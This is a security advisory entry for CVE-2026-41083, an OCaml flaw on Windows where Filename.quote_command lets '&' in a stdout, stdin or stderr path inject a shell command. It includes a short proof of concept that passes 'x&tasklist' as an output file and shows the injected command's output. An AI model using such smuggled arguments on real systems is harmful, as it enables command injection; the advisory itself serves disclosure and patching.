PT-2026-50717 · Git · Ocaml

Published

2026-04-18

Updated

2026-06-18

CVE-2026-41083

CVSS v3.1

6.1

Medium

Vector

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

The quoting of stdin/stdout/stderror (using Filename.quote command) on Windows is not sufficient, and allows the & character to be passed through. This allows an attacker to inject a shell command if they can specify the stdin/stdout/stderr of a program to be executed.

Exploit

bash

$ opam exec -- ocaml
OCaml version 4.14.2
Enter #help;; for help.

# let outfile = "x&tasklist" in
 let cmd = Filename.quote command "netsh.exe" ~stdout:outfile ["help"] in
 ignore (Sys.command cmd)
 ;;

Image Name           PID Session Name    Session#  Mem Usage
========================= ======== ================ =========== ============
System Idle Process       0 Services          0     8 K
System              4 Services          0    168 K
Secure System         236 Services          0  191,468 K
Registry            276 Services          0   3,428 K
smss.exe            608 Services          0   1,676 K
csrss.exe           984 Services          0   5,928 K

Timeline

2026-06-18 release of this security advisory
2026-06-15 release of OCaml 4.14.4
2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853
2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Related Identifiers

CVE-2026-41083

OSEC-2026-05

Affected Products

Ocaml

PT-2026-50717 · Git · Ocaml

CVE-2026-41083

Exploit

Timeline

Related Identifiers

Affected Products

References · 1